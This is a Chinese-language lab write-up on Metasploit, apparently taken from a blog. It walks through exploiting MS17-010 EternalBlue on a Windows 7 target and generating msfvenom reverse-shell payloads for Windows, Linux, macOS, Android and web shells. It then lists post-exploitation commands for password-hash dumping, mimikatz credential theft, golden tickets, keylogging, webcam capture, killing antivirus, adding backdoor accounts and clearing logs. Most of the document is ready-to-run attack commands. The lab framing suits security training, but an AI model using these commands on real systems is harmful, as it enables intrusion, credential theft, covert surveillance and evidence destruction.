MSF应用

实验目的

掌握MSF应用

实验环境

操作机:kali
靶机:win7

实验原理

MSF基础使用

1、漏洞模块利用


进入框架:msfconsole
使用search命令查找相关漏洞: search ms17-010
使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 
使用info查看模块信息: info
设置攻击载荷:set payload windows/x64/meterpreter/reverse_tcp
查看模块需要配置的参数:show options
设置参数:set RHOST 192.168.125.138
攻击:exploit / run


2、生成shellcode
Windows
msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -f exe -o payload.exe 
msfvenom --platform windows -a x64 -p windows/meterpreter/reverse_tcp -f exe -o payload.exe 
msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=4445 -f exe -o payload.exe

linux
msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp -f elf -o payload.elf

mac
msfvenom --platform osx -a x86 -p osx/x86/shell_reverse_tcp -f macho -o payload.macho

Android
msfvenom -p android/meterpreter/reverse_tcp -o payload.apk

aspx
msfvenom --platform windows-p windows/meterpreter/reverse_tcp -f aspx -o payload.aspx

jsp
msfvenom --platform java -p java/jsp_shell_reverse_tcp -f raw -o payload.jsp

php
msfvenom -p php/meterpreter_reverse_tcp -f raw -o payload.php

bash
msfvenom -p cmd/unix/reverse_bash -f raw -o shell.sh

python
msfvenom -p python/meterpreter/reverse_tcp -f raw -o shell.py

后渗透使用

sysinfo #查看目标主机系统信息 
run scraper #查看目标主机详细信息 
run hashdump #导出密码的哈希 
load kiwi #加载mimikatz 
ps #查看目标主机进程信息 
pwd #查看目标当前目录(windows) 
getlwd #查看目标当前目录(Linux) 
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下 
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下 
getpid #查看当前Meterpreter Shell的进程
PID migrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上 
idletime #查看主机运行时间 
getuid #查看获取的当前权限 
getsystem #提权,获得的当前用户是administrator才能成功 
run killav #关闭杀毒软件 
screenshot #截图 
webcam_list #查看目标主机的摄像头
webcam_snap #拍照 
webcam_stream #开视频 
execute 参数 -f 可执行文件 #执行可执行程序 
run getgui -u hack -p 123 #创建hack用户,密码为123 
run getgui -e #开启远程桌面 
keyscan_start #开启键盘记录功能 
keyscan_dump #显示捕捉到的键盘记录信息 
keyscan_stop #停止键盘记录功能 
uictl disable keyboard #禁止目标使用键盘 
uictl enable keyboard #允许目标使用键盘 
uictl disable mouse #禁止目标使用鼠标 
uictl enable mouse #允许目标使用鼠标 load #使用扩展库 
run #使用扩展库
clearev #清除日志

run post/windows/manage/migrate #自动进程迁移 
run post/windows/gather/checkvm #查看目标主机是否运行在虚拟机上 
run post/windows/manage/killav #关闭杀毒软件 
run post/windows/manage/enable_rdp #开启远程桌面服务 
run post/windows/manage/autoroute #查看路由信息 
run post/windows/gather/enum_logged_on_users #列举当前登录的用户 
run post/windows/gather/enum_applications #列举应用程序 
run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码 
run post/windows/gather/smart_hashdump #dump出所有用户的hash

kiwi模块的使用
load kiwi ## 加载kiwi模块
help kiwi creds_all ##列举所有凭据 
creds_kerberos ##列举所有kerberos凭据 
creds_msv ##列举所有msv凭据 
creds_ssp ##列举所有ssp凭据 
creds_tspkg ##列举所有tspkg凭据 
creds_wdigest ##列举所有wdigest凭据 
dcsync ##通过DCSync检索用户帐户信息 
dcsync_ntlm ##通过DCSync检索用户帐户NTLM散列、SID和RID 
golden_ticket_create ##创建黄金票据
kerberos_ticket_list ##列举kerberos票据 
kerberos_ticket_purge ##清除kerberos票据 
kerberos_ticket_use ##使用kerberos票据 
kiwi_cmd ##执行mimikatz的命令,后面接mimikatz.exe的命令 
lsa_dump_sam ##dump出lsa的SAM 
lsa_dump_secrets ##dump出lsa的密文 
password_change ##修改密码 
wifi_list ##列出当前用户的wifi配置文件 
wifi_list_shared ##列出共享wifi配置文件/编码

实验内容

利用ms17_010模块或生成payload.exe方式,获取靶机会话;
掌握后渗透知识,获取靶机信息。

实验步骤

  1. 以MS17010漏洞为例
search ms17_010 搜索ms17_010漏洞模块
use auxiliary/scanner/smb/smb_ms17_010 选择auxiliary辅助探测模块
use exploit/windows/smb/ms17_010_eternalblue 选择攻击模块
set payload windows/x64/meterpreter/reverse_tcp 设置攻击载荷(默认)
set RHOSTS 靶机ip 设置攻击ip

MSF应用_第1张图片

MSF应用_第2张图片

  1. run命令攻击成功。

  1. 后渗透使用
    系统信息:sysifno
    权限为system:getuid
    抓取hash:run/post/windows/gather/smart_hash_dump
    截图:screenshot
    创建用户:run getgui -u hack -p qwe123!@#
    kiwi模块抓取密码:load kiwi

补充:远程连接桌面

  1. set payload windows/x64/vncinject/reverse_tcp

  1. 更改设置:show options

  2. 关闭viewonly:set viewonly false

  1. 后渗透

你可能感兴趣的:(测试工具,安全性测试)